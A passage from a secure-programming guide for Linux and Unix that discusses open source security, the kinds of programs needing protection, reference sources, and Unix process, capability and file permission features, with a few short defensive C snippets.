must know how to write secure programs. Hopefully the existence of this
book will help. Clearly, it doesn't matter if there are ``many eyeballs''
if none of the eyeballs know what to look for. Note that it's not
necessary for everyone to know how to write secure programs, as long as
those who do know how are examining the code changes.
  * Third, once found, these problems need to be fixed quickly and their
fixes distributed. Open source systems tend to fix the problems quickly,
but the distribution is not always smooth. For example, the OpenBSD
developers do an excellent job of reviewing code for security flaws - but
they don't always report the identified problems back to the original
developer. Thus, it's quite possible for there to be a fixed version in
one system, but for the flaw to remain in another. I believe this problem
is lessening over time, since no one ``downstream'' likes to repeatedly
fix the same problem. Of course, ensuring that security patches are
actually installed on end-user systems is a problem for both open source
and closed source software.
Another advantage of open source is that, if you find a problem, you can fix
it immediately. This really doesn't have any counterpart in closed source.
In short, the effect on security of open source software is still a major
debate in the security community, though a large number of prominent experts
believe that it has great potential to be more secure.
-----------------------------------------------------------------------------
2.5. Types of Secure Programs
Many different types of programs may need to be secure programs (as the term
is defined in this book). Some common types are:
  * Application programs used as viewers of remote data. Programs used as
viewers (such as word processors or file format viewers) are often asked
to view data sent remotely by an untrusted user (this request may be
automatically invoked by a web browser). Clearly, the untrusted user's
input should not be allowed to cause the application to run arbitrary
programs. It's usually unwise to support initialization macros (run when
the data is displayed); if you must, then you must create a secure
sandbox (a complex and error-prone task that almost never succeeds, which
is why you shouldn't support macros in the first place). Be careful of
issues such as buffer overflow, discussed in Chapter 6, which might allow
an untrusted user to force the viewer to run an arbitrary program.
  * Application programs used by the administrator (root). Such programs
shouldn't trust information that can be controlled by non-administrators.
  * Local servers (also called daemons).
  * Network-accessible servers (sometimes called network daemons).
  * Web-based applications (including CGI scripts). These are a special case
of network-accessible servers, but they're so common they deserve their
own category. Such programs are invoked indirectly via a web server,
which filters out some attacks but nevertheless leaves many attacks that
must be withstood.
  * Applets (i.e., programs downloaded to the client for automatic
execution). This is something Java is especially famous for, though other
languages (such as Python) support mobile code as well. There are several
security viewpoints here; the implementer of the applet infrastructure on
the client side has to make sure that the only operations allowed are
``safe'' ones, and the writer of an applet has to deal with the problem
of hostile hosts (in other words, you can't normally trust the client).
There is some research attempting to deal with running applets on hostile
hosts, but frankly I'm skeptical of the value of these approaches and
this subject is exotic enough that I don't cover it further here.
  * setuid/setgid programs. These programs are invoked by a local user and,
when executed, are immediately granted the privileges of the program's
owner and/or owner's group. In many ways these are the hardest programs
to secure, because so many of their inputs are under the control of the
untrusted user and some of those inputs are not obvious.
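One of the non-obvious inputs to a setuid/setgid program mentioned above is the environment, which the invoking (untrusted) user fully controls. A minimal sketch of one defensive step follows; the function name and the variable list are my own, and a real program would go further and rebuild a minimal environment from scratch rather than merely deleting known-bad entries.

```c
#include <stdlib.h>

/* Sketch for setuid/setgid programs: the environment is an
 * attacker-controlled input, so strip variables that influence the
 * dynamic linker and the shell before doing anything else. This
 * list is illustrative, not complete. */
static void scrub_dangerous_env(void)
{
    static const char *const dangerous[] = {
        "IFS", "LD_PRELOAD", "LD_LIBRARY_PATH", "ENV", "BASH_ENV", NULL
    };

    for (int i = 0; dangerous[i] != NULL; i++)
        unsetenv(dangerous[i]);  /* ignore result: already-absent is fine */
}
```

Calling this (or, better, rebuilding the environment) should happen before any library call that might consult these variables.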
This book merges the issues of these different types of program into a single
set. The disadvantage of this approach is that some of the issues identified
here don't apply to all types of programs. In particular, setuid/setgid
programs have many surprising inputs and several of the guidelines here only
apply to them. However, things are not so clear-cut, because a particular
program may cut across these boundaries (e.g., a CGI script may be setuid or
setgid, or be configured in a way that has the same effect), and some
programs are divided into several executables each of which can be considered
a different ``type'' of program. The advantage of considering all of these
program types together is that we can consider all issues without trying to
apply an inappropriate category to a program. As will be seen, many of the
principles apply to all programs that need to be secured.
There is a slight bias in this book toward programs written in C, with some
notes on other languages such as C++, Perl, PHP, Python, Ada95, and Java.
This is because C is the most common language for implementing secure
programs on Unix-like systems (other than CGI scripts, which tend to use
languages such as Perl, PHP, or Python). Also, most other languages'
implementations call the C library. This is not to imply that C is somehow
the ``best'' language for this purpose, and most of the principles described
here apply regardless of the programming language used.
-----------------------------------------------------------------------------
2.6. Paranoia is a Virtue
The primary difficulty in writing secure programs is that writing them
requires a different mind-set, in short, a paranoid mind-set. The reason is
that the impact of errors (also called defects or bugs) can be profoundly
different.
Normal non-secure programs have many errors. While these errors are
undesirable, these errors usually involve rare or unlikely situations, and if
a user should stumble upon one they will try to avoid using the tool that way
in the future.
In secure programs, the situation is reversed. Certain users will
intentionally search out and cause rare or unlikely situations, in the hope
that such attacks will give them unwarranted privileges. As a result, when
writing secure programs, paranoia is a virtue.
-----------------------------------------------------------------------------
2.7. Why Did I Write This Document?
One question I've been asked is ``why did you write this book''? Here's my
answer: Over the last several years I've noticed that many developers for
Linux and Unix seem to keep falling into the same security pitfalls, again
and again. Auditors were slowly catching problems, but it would have been
better if the problems weren't put into the code in the first place. I
believe that part of the problem was that there wasn't a single, obvious
place where developers could go and get information on how to avoid known
pitfalls. The information was publicly available, but it was often hard to
find, out-of-date, incomplete, or had other problems. Most such information
didn't particularly discuss Linux at all, even though it was becoming widely
used! That leads up to the answer: I developed this book in the hope that
future software developers won't repeat past mistakes, resulting in more
secure systems. You can see a larger discussion of this at [http://
www.linuxsecurity.com/feature_stories/feature_story-6.html] http://
www.linuxsecurity.com/feature_stories/feature_story-6.html.
A related question that could be asked is ``why did you write your own book
instead of just referring to other documents''? There are several answers:
  * Much of this information was scattered about; placing the critical
information in one organized document makes it easier to use.
  * Some of this information is not written for the programmer, but is
written for an administrator or user.
  * Much of the available information emphasizes portable constructs
(constructs that work on all Unix-like systems) and fails to discuss
Linux at all. It's often best to avoid Linux-unique abilities for
portability's sake, but sometimes the Linux-unique abilities can really
aid security. Even if non-Linux portability is desired, you may want to
support the Linux-unique abilities when running on Linux. And, by
emphasizing Linux, I can include references to information that is
helpful to someone targeting Linux that is not necessarily true for
others.
-----------------------------------------------------------------------------
2.8. Sources of Design and Implementation Guidelines
Several documents help describe how to write secure programs (or,
alternatively, how to find security problems in existing programs), and were
the basis for the guidelines highlighted in the rest of this book.
For general-purpose servers and setuid/setgid programs, there are a number of
valuable documents (though some are difficult to find without having a
reference to them).
Matt Bishop [1996, 1997] has developed several extremely valuable papers and
presentations on the topic, and in fact he has a web page dedicated to the
topic at [http://olympus.cs.ucdavis.edu/~bishop/secprog.html] http://
olympus.cs.ucdavis.edu/~bishop/secprog.html. AUSCERT has released a
programming checklist [ftp://ftp.auscert.org.au/pub/auscert/papers/
secure_programming_checklist] [AUSCERT 1996], based in part on chapter 23 of
Garfinkel and Spafford's book discussing how to write secure SUID and network
programs [http://www.oreilly.com/catalog/puis] [Garfinkel 1996]. [http://
www.sunworld.com/swol-04-1998/swol-04-security.html] Galvin [1998a] described
a simple process and checklist for developing secure programs; he later
updated the checklist in [http://www.sunworld.com/sunworldonline/swol-08-1998
/swol-08-security.html] Galvin [1998b]. [http://www.pobox.com/~kragen/
security-holes.html] Sitaker [1999] presents a list of issues for the ``Linux
security audit'' team to search for. [http://www.homeport.org/~adam/
review.html] Shostack [1999] defines another checklist for reviewing
security-sensitive code. The NCSA [http://www.ncsa.uiuc.edu/General/Grid/ACES
/security/programming] [NCSA] provides a set of terse but useful secure
programming guidelines. Other useful information sources include the Secure
Unix Programming FAQ [http://www.whitefang.com/sup/] [Al-Herbish 1999], the
Security-Audit's Frequently Asked Questions [http://lsap.org/faq.txt] [Graham
1999], and [http://www.clark.net/pub/mjr/pubs/pdf/] Ranum [1998]. Some
recommendations must be taken with caution, for example, the BSD setuid(7)
man page [http://www.homeport.org/~adam/setuid.7.html] [Unknown] recommends
the use of access(3) without noting the dangerous race conditions that
usually accompany it. Wood [1985] has some useful but dated advice in its
``Security for Programmers'' chapter. [http://www.research.att.com/~smb/
talks] Bellovin [1994] includes useful guidelines and some specific examples,
such as how to restructure an ftpd implementation to be simpler and more
secure. FreeBSD provides some guidelines [http://www.freebsd.org/security/
security.html] FreeBSD [1999]. [http://developer.gnome.org/doc/guides/
programming-guidelines/book1.html] [Quintero 1999] is primarily concerned
with GNOME programming guidelines, but it includes a section on security
considerations. [http://www.fish.com/security/murphy.html] [Venema 1996]
provides a detailed discussion (with examples) of some common errors when
programming secure programs (widely-known or predictable passwords, burning
yourself with malicious data, secrets in user-accessible data, and depending
on other programs). [http://www.fish.com/security/maldata.html] [Sibert 1996]
describes threats arising from malicious data. Michael Bacarella's article
[http://m.bacarella.com/papers/secsoft/html] The Peon's Guide To Secure
System Development provides a nice short set of guidelines.
There are many documents giving security guidelines for programs using the
Common Gateway Interface (CGI) to interface with the web. These include
[http://www.csclub.uwaterloo.ca/u/mlvanbie/cgisec] Van Biesbrouck [1996],
[http://language.perl.com/CPAN/doc/FAQs/cgi/perl-cgi-faq.html] Gundavaram
[unknown], [http://webreview.com/wr/pub/97/08/08/bookshelf] [Garfinkle 1997]
[http://www.eekim.com/pubs/cgibook] Kim [1996], [http://www.go2net.com/people
/paulp/cgi-security/safe-cgi.txt] Phillips [1995], [http://www.w3.org/
Security/Faq/www-security-faq.html] Stein [1999], [http://members.home.net/
razvan.peteanu] [Peteanu 2000], and [http://advosys.ca/tips/
web-security.html] [Advosys 2000].
There are many documents specific to a language, which are further discussed
in the language-specific sections of this book. For example, the Perl
distribution includes [http://www.perl.com/pub/doc/manual/html/pod/
perlsec.html] perlsec(1), which describes how to use Perl more securely. The
Secure Internet Programming site at [http://www.cs.princeton.edu/sip] http://
www.cs.princeton.edu/sip is interested in computer security issues in
general, but focuses on mobile code systems such as Java, ActiveX, and
JavaScript; Ed Felten (one of its principals) co-wrote a book on securing
Java ([http://www.securingjava.com] [McGraw 1999]) which is discussed in
Section 10.6. Sun's security code guidelines provide some guidelines
primarily for Java and C; it is available at [http://java.sun.com/security/
seccodeguide.html] http://java.sun.com/security/seccodeguide.html.
Yoder [1998] contains a collection of patterns to be used when dealing with
application security. It's not really a specific set of guidelines, but a set
of commonly-used patterns for programming that you may find useful. The
Shmoo group maintains a web page linking to information on how to write
secure code at [http://www.shmoo.com/securecode] http://www.shmoo.com/
securecode.
There are many documents describing the issue from the other direction (i.e.,
``how to crack a system''). One example is McClure [1999], and there's
countless amounts of material from that vantage point on the Internet. There
are also more general documents on computer architectures on how attacks must
be developed to exploit them, e.g., [LSD 2001]. The Honeynet Project has been
collecting information (including statistics) on how attackers actually
perform their attacks; see their website at [http://project.honeynet.org]
http://project.honeynet.org for more information.
There's also a large body of information on vulnerabilities already
identified in existing programs. This can be a useful set of examples of
``what not to do,'' though it takes effort to extract more general guidelines
from the large body of specific examples. There are mailing lists that
discuss security issues; one of the most well-known is [http://
SecurityFocus.com/forums/bugtraq/faq.html] Bugtraq, which among other things
develops a list of vulnerabilities. The CERT Coordination Center (CERT/CC) is
a major reporting center for Internet security problems which reports on
vulnerabilities. The CERT/CC occasionally produces advisories that provide a
description of a serious security problem and its impact, along with
instructions on how to obtain a patch or details of a workaround; for more
information see [http://www.cert.org] http://www.cert.org. Note that
originally the CERT was a small computer emergency response team, but
officially ``CERT'' doesn't stand for anything now. The Department of
Energy's Computer Incident Advisory Capability (CIAC) also reports on
vulnerabilities. These different groups may identify the same vulnerabilities
but use different names. To resolve this problem, MITRE supports the Common
Vulnerabilities and Exposures (CVE) list which creates a single unique
identifier (``name'') for all publicly known vulnerabilities and security
exposures identified by others; see [http://www.cve.mitre.org] http://
www.cve.mitre.org. NIST's ICAT is a searchable catalog of computer
vulnerabilities, categorizing each CVE vulnerability so that they can be
searched and compared later; see [http://csrc.nist.gov/icat] http://
csrc.nist.gov/icat.
This book is a summary of what I believe are the most useful and important
guidelines. My goal is a book that a good programmer can just read and then
be fairly well prepared to implement a secure program. No single document can
really meet this goal, but I believe the attempt is worthwhile. My objective
is to strike a balance somewhere between a ``complete list of all possible
guidelines'' (that would be unending and unreadable) and the various
``short'' lists available on-line that are nice and short but omit a large
number of critical issues. When in doubt, I include the guidance; I believe
in that case it's better to make the information available to everyone in
this ``one stop shop'' document. The organization presented here is my own
(every list has its own, different structure), and some of the guidelines
(especially the Linux-unique ones, such as those on capabilities and the
FSUID value) are also my own. Reading all of the referenced documents listed
above as well is highly recommended, though I realize that for many it's
impractical.
-----------------------------------------------------------------------------
2.9. Other Sources of Security Information
There are a vast number of web sites and mailing lists dedicated to security
issues. Here are some other sources of security information:
  * [http://www.securityfocus.com] Securityfocus.com has a wealth of general
security-related news and information, and hosts a number of
security-related mailing lists. See their website for information on how
to subscribe and view their archives. A few of the most relevant mailing
lists on SecurityFocus are:
    + The ``Bugtraq'' mailing list is, as noted above, a ``full disclosure
moderated mailing list for the detailed discussion and announcement
of computer security vulnerabilities: what they are, how to exploit
them, and how to fix them.''
    + The ``secprog'' mailing list is a moderated mailing list for the
discussion of secure software development methodologies and
techniques. I specifically monitor this list, and I coordinate with
its moderator to ensure that resolutions reached in SECPROG (if I
agree with them) are incorporated into this document.
    + The ``vuln-dev'' mailing list discusses potential or undeveloped
holes.
  * IBM's ``developerWorks: Security'' has a library of interesting articles.
You can learn more from [http://www.ibm.com/developer/security] http://
www.ibm.com/developer/security.
  * For Linux-specific security information, a good source is [http://
www.linuxsecurity.com] LinuxSecurity.com. If you're interested in
auditing Linux code, places to see include the Linux Security-Audit
Project FAQ and the [http://www.lkap.org] Linux Kernel Auditing Project,
which are dedicated to auditing Linux code for security issues.
Of course, if you're securing specific systems, you should sign up to their
security mailing lists (e.g., Microsoft's, Red Hat's, etc.) so you can be
warned of any security updates.
-----------------------------------------------------------------------------
2.10. Document Conventions
System manual pages are referenced in the format name(number), where number
is the section number of the manual. The pointer value that means ``does not
point anywhere'' is called NULL; C compilers will convert the integer 0 to
the value NULL in most circumstances where a pointer is needed, but note that
nothing in the C standard requires that NULL actually be implemented by a
series of all-zero bits. C and C++ treat the character '\0' (ASCII 0)
specially, and this value is referred to as NIL in this book (this is usually
called ``NUL'', but ``NUL'' and ``NULL'' sound identical). Function and
method names always use the correct case, even if that means that some
sentences must begin with a lower case letter. I use the term ``Unix-like''
to mean Unix, Linux, or other systems whose underlying models are very
similar to Unix; I can't say POSIX, because there are systems such as Windows
2000 that implement portions of POSIX yet have vastly different security
models.
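The NULL/NIL distinction above can be shown in a small C illustration (the function is a hypothetical strlen work-alike written for this example, not code from the book):

```c
#include <stddef.h>
#include <string.h>

/* NULL is the pointer value that points nowhere; NIL (the character
 * '\0', usually spelled NUL) is the byte that terminates C strings.
 * The literal 0 converts to NULL in pointer contexts, but the C
 * standard does not promise that a null pointer is represented by
 * all-zero bits in memory. */
static size_t length_up_to_nil(const char *s)
{
    size_t n = 0;
    if (s == NULL)          /* a null *pointer*: no string at all */
        return 0;
    while (s[n] != '\0')    /* NIL, the terminating *character* */
        n++;
    return n;               /* same result as strlen(s) for real strings */
}
```

Confusing the two (for example, passing NULL where a string is expected) is a recurring source of crashes and, sometimes, vulnerabilities.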
An attacker is called an ``attacker'', ``cracker'', or ``adversary'', and not
a ``hacker''. Some journalists mistakenly use the word ``hacker'' instead of
``attacker''; this book avoids this misuse, because many Linux and Unix
developers refer to themselves as ``hackers'' in the traditional non-evil
sense of the term. To many Linux and Unix developers, the term ``hacker''
continues to mean simply an expert or enthusiast, particularly regarding
computers. It is true that some hackers commit malicious or intrusive
actions, but many other hackers do not, and it's unfair to claim that all
hackers perform malicious activities. Many other glossaries and books note
that not all hackers are attackers. For example, the Industry Advisory
Council's Information Assurance (IA) Special Interest Group (SIG)'s [http://
www.iaconline.org/sig_infoassure.html] Information Assurance Glossary defines
hacker as ``A person who delights in having an intimate understanding of the
internal workings of computers and computer networks. The term is misused in
a negative context where `cracker' should be used.'' The Jargon File has a
[http://www.catb.org/~esr/jargon/html/entry/hacker.html] long and complicated
definition for hacker, starting with ``A person who enjoys exploring the
details of programmable systems and how to stretch their capabilities, as
opposed to most users, who prefer to learn only the minimum necessary.''; it
notes although some people use the term to mean ``A malicious meddler who
tries to discover sensitive information by poking around'', it also states
that this definition is deprecated and that the correct term for this sense
is ``cracker''.
This book uses the ``new'' or ``logical'' quoting system, instead of the
traditional American quoting system: quoted information does not include any
trailing punctuation if the punctuation is not part of the material being
quoted. While this may cause a minor loss of typographical beauty, the
traditional American system causes extraneous characters to be placed inside
the quotes. These extraneous characters have no effect on prose but can be
disastrous in code or computer commands. I use standard American (not
British) spelling; I've yet to meet an English speaker on any continent who
has trouble with this.
-----------------------------------------------------------------------------
Chapter 3. Summary of Linux and Unix Security Features
      Discretion will protect you, and
      understanding will guard you.
      Proverbs 2:11 (NIV)
Before discussing guidelines on how to use Linux or Unix security features,
it's useful to know what those features are from a programmer's viewpoint.
This section briefly describes those features that are widely available on
nearly all Unix-like systems. However, note that there is considerable
variation between different versions of Unix-like systems, and not all
systems have the abilities described here. This chapter also notes some
extensions or features specific to Linux; Linux distributions tend to be
fairly similar to each other from the point-of-view of programming for
security, because they all use essentially the same kernel and C library (and
the GPL-based licenses encourage rapid dissemination of any innovations). It
also notes some of the security-relevant differences between different Unix
implementations, but please note that this isn't an exhaustive list. This
chapter doesn't discuss issues such as implementations of mandatory access
control (MAC) which many Unix-like systems do not implement. If you already
know what those features are, please feel free to skip this section.
Many programming guides skim briefly over the security-relevant portions of
Linux or Unix and skip important information. In particular, they often
discuss ``how to use'' something in general terms but gloss over the security
attributes that affect their use. Conversely, there's a great deal of
detailed information in the manual pages about individual functions, but the
manual pages sometimes obscure key security issues with detailed discussions
on how to use each individual function. This section tries to bridge that
gap; it gives an overview of the security mechanisms in Linux that are likely
to be used by a programmer, but concentrating specifically on the security
ramifications. This section has more depth than the typical programming
guides, focusing specifically on security-related matters, and points to
references where you can get more details.
First, the basics. Linux and Unix are fundamentally divided into two parts:
the kernel and ``user space''. Most programs execute in user space (on top of
the kernel). Linux supports the concept of ``kernel modules'', which is
simply the ability to dynamically load code into the kernel, but note that it
still has this fundamental division. Some other systems (such as the HURD)
are ``microkernel'' based systems; they have a small kernel with more limited
functionality, and a set of ``user'' programs that implement the lower-level
functions traditionally implemented by the kernel.
Some Unix-like systems have been extensively modified to support strong
security, in particular to support U.S. Department of Defense requirements
for Mandatory Access Control (level B1 or higher). This version of this book
doesn't cover these systems or issues; I hope to expand to that in a future
version. More detailed information on some of them is available elsewhere,
for example, details on SGI's ``Trusted IRIX/B'' are available in NSA's Final
Evaluation Reports (FERs).
When users log in, their usernames are mapped to integers marking their
``UID'' (for ``user id'') and the ``GID''s (for ``group id'') that they are a
member of. UID 0 is a special privileged user (role) traditionally called
``root''; on most Unix-like systems (including Unix) root can overrule most
security checks and is used to administrate the system. On some Unix systems,
GID 0 is also special and permits unrestricted access to resources at the
group level [Gay 2000, 228]; this isn't true on other systems (such as
Linux), but even in those systems group 0 is essentially all-powerful because
so many special system files are owned by group 0. Processes are the only
``subjects'' in terms of security (that is, only processes are active
objects). Processes can access various data objects, in particular filesystem
objects (FSOs), System V Interprocess Communication (IPC) objects, and
network ports. Processes can also set signals. Other security-relevant topics
include quotas and limits, libraries, auditing, and PAM. The next few
subsections detail this.
-----------------------------------------------------------------------------
3.1. Processes
In Unix-like systems, user-level activities are implemented by running
processes. Most Unix systems support a ``thread'' as a separate concept;
threads share memory inside a process, and the system scheduler actually
schedules threads. Linux does this differently (and in my opinion uses a
better approach): there is no essential difference between a thread and a
process. Instead, in Linux, when a process creates another process it can
choose what resources are shared (e.g., memory can be shared). The Linux
kernel then performs optimizations to get thread-level speeds; see clone(2)
for more information. It's worth noting that the Linux kernel developers tend
to use the word ``task'', not ``thread'' or ``process'', but the external
documentation tends to use the word process (so I'll use the term ``process''
here). When programming a multi-threaded application, it's usually better to
use one of the standard thread libraries that hide these differences. Not
only does this make threading more portable, but some libraries provide an
additional level of indirection, by implementing more than one
application-level thread as a single operating system thread; this can
provide some improved performance on some systems for some applications.
-----------------------------------------------------------------------------
3.1.1. Process Attributes
Here are typical attributes associated with each process in a Unix-like
system:
  * RUID, RGID - real UID and GID of the user on whose behalf the process
    is running
  * EUID, EGID - effective UID and GID used for privilege checks (except
    for the filesystem)
  * SUID, SGID - saved UID and GID; used to support switching permissions
    ``on and off'' as discussed below. Not all Unix-like systems support
    this, but the vast majority do (including Linux and Solaris); if you
    want to check whether a given system implements this option in the
    POSIX standard, you can use sysconf(2) to determine if
    _POSIX_SAVED_IDS is in effect.
  * supplemental groups - a list of groups (GIDs) in which this user has
    membership. In the original version 7 Unix, this didn't exist -
    processes were only a member of one group at a time, and a special
    command had to be executed to change that group. BSD added support for
    a list of groups in each process, which is more flexible, and this
    addition is now widely implemented (including by Linux and Solaris).
  * umask - a set of bits determining the default access control settings
    when a new filesystem object is created; see umask(2).
  * scheduling parameters - each process has a scheduling policy, and
    those with the default policy SCHED_OTHER have the additional
    parameters nice, priority, and counter. See sched_setscheduler(2) for
    more information.
  * limits - per-process resource limits (see below).
  * filesystem root - the process' idea of where the root filesystem ("/")
    begins; see chroot(2).
Here are less-common attributes associated with processes:
  * FSUID, FSGID - UID and GID used for filesystem access checks; these
    are usually equal to the EUID and EGID respectively. This is a
    Linux-unique attribute.
  * capabilities - POSIX capability information; there are actually three
    sets of capabilities on a process: the effective, inheritable, and
    permitted capabilities. See below for more information on POSIX
    capabilities. Linux kernel version 2.2 and greater support this; some
    other Unix-like systems do too, but it's not as widespread.
In Linux, if you really need to know exactly what attributes are associated
with each process, the most definitive source is the Linux source code, in
particular /usr/include/linux/sched.h's definition of task_struct.
The portable way to create new processes is to use the fork(2) call. BSD
introduced a variant called vfork(2) as an optimization technique. The bottom
line with vfork(2) is simple: don't use it if you can avoid it. See Section
8.6 for more information.
Linux supports the Linux-unique clone(2) call. This call works like fork(2),
but allows specification of which resources should be shared (e.g., memory,
file descriptors, etc.). Various BSD systems implement an rfork() system call
(originally developed in Plan9); it has different semantics but the same
general idea (it also creates a process with tighter control over what is
shared). Portable programs shouldn't use these calls directly, if possible;
as noted earlier, they should instead rely on threading libraries that use
such calls to implement threads.
This book is not a full tutorial on writing programs, so I will skip
widely-available information on handling processes. See the documentation for
wait(2), exit(2), and so on for more information.
-----------------------------------------------------------------------------
3.1.2. POSIX Capabilities
POSIX capabilities are sets of bits that permit splitting of the privileges
typically held by root into a larger set of more specific privileges. POSIX
capabilities are defined by a draft IEEE standard; they're not unique to
Linux but they're not universally supported by other Unix-like systems
either. Linux kernel 2.0 did not support POSIX capabilities, while version
2.2 added support for POSIX capabilities to processes. When Linux
documentation (including this one) says ``requires root privilege'', in
nearly all cases it really means ``requires a capability'' as documented in
the capability documentation. If you need to know the specific capability
required, look it up in the capability documentation.
In Linux, the eventual intent is to permit capabilities to be attached to
files in the filesystem; as of this writing, however, this is not yet
supported. There is support for transferring capabilities, but this is
disabled by default. Linux version 2.2.11 added a feature that makes
capabilities more directly useful, called the ``capability bounding set''.
The capability bounding set is a list of capabilities that are allowed to be
held by any process on the system (otherwise, only the special init process
can hold it). If a capability does not appear in the bounding set, it may not
be exercised by any process, no matter how privileged. This feature can be
used to, for example, disable kernel module loading. A sample tool that takes
advantage of this is LCAP at [http://pweb.netcom.com/~spoon/lcap/] http://
pweb.netcom.com/~spoon/lcap/.
More information about POSIX capabilities is available at [ftp://
linux.kernel.org/pub/linux/libs/security/linux-privs] ftp://linux.kernel.org/
pub/linux/libs/security/linux-privs.
-----------------------------------------------------------------------------
3.1.3. Process Creation and Manipulation
Processes may be created using fork(2), the non-recommended vfork(2), or the
Linux-unique clone(2); all of these system calls duplicate the existing
process, creating two processes out of it. A process can execute a different
program by calling execve(2), or various front-ends to it (for example, see
exec(3), system(3), and popen(3)).
When a program is executed, and its file has its setuid or setgid bit set,
the process' EUID or EGID (respectively) is usually set to the file's value.
This functionality was the source of an old Unix security weakness when used
to support setuid or setgid scripts, due to a race condition. Between the
time the kernel opens the file to see which interpreter to run, and when the
(now-set-id) interpreter turns around and reopens the file to interpret it,
an attacker might change the file (directly or via symbolic links).
Different Unix-like systems handle the security issue for setuid scripts in
different ways. Some systems, such as Linux, completely ignore the setuid and
setgid bits when executing scripts, which is clearly a safe approach. Most
modern releases of SysVr4 and BSD 4.4 use a different approach to avoid the
kernel race condition. On these systems, when the kernel passes the name of
the set-id script to open to the interpreter, rather than using a pathname
(which would permit the race condition) it instead passes the filename /dev/
fd/3. This is a special file already opened on the script, so that there can
be no race condition for attackers to exploit. Even on these systems I
recommend against using setuid/setgid shell scripts for secure programs, as
discussed below.
In some cases a process can affect the various UID and GID values; see setuid
(2), seteuid(2), setreuid(2), and the Linux-unique setfsuid(2). In particular
the saved user id (SUID) attribute is there to permit trusted programs to
temporarily switch UIDs. Unix-like systems supporting the SUID use the
following rules: If the RUID is changed, or the EUID is set to a value not
equal to the RUID, the SUID is set to the new EUID. Unprivileged users can
set their EUID from their SUID, the RUID to the EUID, and the EUID to the
RUID.
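Under these rules, a set-uid program can temporarily drop its privileges and
later restore them via the saved UID. The following is a minimal sketch (the
function names are mine, not a standard API; real code should also verify
the change took effect, as seteuid can fail):

```c
#include <sys/types.h>
#include <unistd.h>

/* Sketch: in a setuid program, temporarily run with the invoking
   user's identity.  seteuid(getuid()) sets EUID := RUID; the saved
   UID (SUID) still holds the privileged value, so privilege can be
   re-acquired later.  Returns 0 on success, -1 on failure. */
int drop_priv_temporarily(void) {
    return seteuid(getuid());
}

/* Restore the privileged EUID; allowed because SUID == priv_uid. */
int restore_priv(uid_t priv_uid) {
    return seteuid(priv_uid);
}
```

If run without privilege the calls are harmless no-ops (setting the EUID to
a value it already has is always permitted).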
The Linux-unique FSUID process attribute is intended to permit programs like
the NFS server to limit themselves to only the filesystem rights of some
given UID without giving that UID permission to send signals to the process.
Whenever the EUID is changed, the FSUID is changed to the new EUID value; the
FSUID value can be set separately using setfsuid(2), a Linux-unique call.
Note that non-root callers can only set FSUID to the current RUID, EUID,
SUID, or current FSUID values.
-----------------------------------------------------------------------------
3.2. Files
On all Unix-like systems, the primary repository of information is the file
tree, rooted at ``/''. The file tree is a hierarchical set of directories,
each of which may contain filesystem objects (FSOs).
In Linux, filesystem objects (FSOs) may be ordinary files, directories,
symbolic links, named pipes (also called first-in first-outs or FIFOs),
sockets (see below), character special (device) files, or block special
(device) files (in Linux, this list is given in the find(1) command). Other
Unix-like systems have an identical or similar list of FSO types.
Filesystem objects are collected on filesystems, which can be mounted and
unmounted on directories in the file tree. A filesystem type (e.g., ext2 and
FAT) is a specific set of conventions for arranging data on the disk to
optimize speed, reliability, and so on; many people use the term
``filesystem'' as a synonym for the filesystem type.
-----------------------------------------------------------------------------
3.2.1. Filesystem Object Attributes
Different Unix-like systems support different filesystem types. Filesystems
may have slightly different sets of access control attributes and access
controls can be affected by options selected at mount time. On Linux, the
ext2 filesystem is currently the most popular, but Linux supports
a vast number of filesystems. Most Unix-like systems tend to support multiple
filesystems too.
Most filesystems on Unix-like systems store at least the following:
  * owning UID and GID - identifies the ``owner'' of the filesystem
    object. Only the owner or root can change the access control
    attributes unless otherwise noted.
  * permission bits - read, write, execute bits for each of user (owner),
    group, and other. For ordinary files, read, write, and execute have
    their typical meanings. In directories, the ``read'' permission is
    necessary to display a directory's contents, while the ``execute''
    permission is sometimes called ``search'' permission and is necessary
    to actually enter the directory to use its contents. ``Write''
    permission on a directory permits adding, removing, and renaming files
    in that directory; if you only want to permit adding, set the sticky
    bit noted below. Note that the permission values of symbolic links are
    never used; it's only the values of their containing directories and
    the linked-to file that matter.
  * ``sticky'' bit - when set on a directory, unlinks (removes) and
    renames of files in that directory are limited to the file owner, the
    directory owner, or root. This is a very common Unix extension and is
    specified in the Open Group's Single Unix Specification version 2. Old
    versions of Unix called this the ``save program text'' bit and used it
    to indicate executable files that should stay in memory. Systems that
    did this ensured that only root could set this bit (otherwise users
    could have crashed systems by forcing ``everything'' into memory). In
    Linux, this bit has no effect on ordinary files and ordinary users can
    modify this bit on the files they own: Linux's virtual memory
    management makes this old use irrelevant.
  * setuid, setgid - when set on an executable file, executing the file
    will set the process' effective UID or effective GID to the value of
    the file's owning UID or GID (respectively). All Unix-like systems
    support this. In Linux and System V systems, when setgid is set on a
    file that does not have any execute privileges, this indicates a file
    that is subject to mandatory locking during access (if the filesystem
    is mounted to support mandatory locking); this overload of meaning
    surprises many and is not universal across Unix-like systems. In fact,
    the Open Group's Single Unix Specification version 2 for chmod(3)
    permits systems to ignore requests to turn on setgid for files that
    aren't executable if such a setting has no meaning. In Linux and
    Solaris, when setgid is set on a directory, files created in the
    directory will have their GID automatically set to the directory's
    GID. The purpose of this approach is to support ``project
    directories'': users can save files into such specially-set
    directories and the group owner automatically changes. However,
    setting the setgid bit on directories is not specified by standards
    such as the Single Unix Specification [Open Group 1997].
  * timestamps - access and modification times are stored for each
    filesystem object. However, the owner is allowed to set these values
    arbitrarily (see touch(1)), so be careful about trusting this
    information. All Unix-like systems support this.
The following attributes are Linux-unique extensions on the ext2 filesystem,
though many other filesystems have similar functionality:
  * immutable bit - no changes to the filesystem object are allowed; only
    root can set or clear this bit. This is only supported by ext2 and is
    not portable across all Unix systems (or even all Linux filesystems).
  * append-only bit - only appending to the filesystem object is allowed;
    only root can set or clear this bit. This is only supported by ext2
    and is not portable across all Unix systems (or even all Linux
    filesystems).
Other common extensions include some sort of bit indicating ``cannot delete
this file''.
Many of these values can be influenced at mount time, so that, for example,
certain bits can be treated as though they had a certain value (regardless of
their values on the media). See mount(1) for more information about this.
These bits are useful, but be aware that some of these are intended to
simplify ease-of-use and aren't really sufficient to prevent certain actions.
For example, on Linux, mounting with ``noexec'' will disable execution of
programs on that file system; as noted in the manual, it's intended for
mounting filesystems containing binaries for incompatible systems. On Linux,
this option won't completely prevent someone from running the files; they can
copy the files somewhere else to run them, or even use the command ``/lib/
ld-linux.so.2'' to run the file directly.
Some filesystems don't support some of these access control values; again,
see mount(1) for how these filesystems are handled. In particular, many
